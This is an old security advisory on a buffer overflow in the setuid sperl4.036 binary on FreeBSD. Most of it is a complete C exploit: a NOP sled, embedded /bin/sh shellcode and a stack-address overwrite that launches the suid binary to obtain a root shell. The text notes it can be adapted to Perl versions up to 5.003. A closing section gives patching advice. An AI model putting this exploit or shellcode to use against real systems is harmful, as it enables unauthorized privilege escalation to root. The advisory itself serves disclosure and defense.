COMMAND
	    sperl4.036
SYSTEMS AFFECTED
	    FreeBSD
PROBLEM
	    With a little  modyfication of OFFSET  value you can  overflow all
	    versions  up  to   perl5.003.   Credit  for   this  goes  to   OVX
	    [email protected] who made this exploit available.
	
	    /************************************************************/
	    /*   Exploit for FreeBSD sperl4.036 by OVX                  */
	    /************************************************************/
	    #include <stdio.h>
	    #include <stdlib.h>
	    #include <unistd.h>
	    #define BUFFER_SIZE     1400
	    #define OFFSET          600
	    char *get_esp(void) {
	        asm("movl %esp,%eax");
	    }
	    char buf[BUFFER_SIZE];
	    main(int argc, char *argv[])
	    {
	            int i;
	            char execshell[] =
	            "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
	            "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
	            "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
	            "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
	            for(i=0+1;i<BUFFER_SIZE-4;i+=4)
	              *(char **)&buf[i] = get_esp() - OFFSET;
	            memset(buf,0x90,768+1);
	            memcpy(&buf[768+1],execshell,strlen(execshell));
	            buf[BUFFER_SIZE-1]=0;
	            execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
	    }
	
SOLUTION
	    Obtain  and  install  the  appropriate  patch  according  to   the
	    instructions included with the  patch. If you have  installed Perl
	    from source code, you should install source code patches.  Patches
	    are available from the  CPAN (Comprehensive Perl Archive  Network)
	    archives.  You may also remove suid bit util then.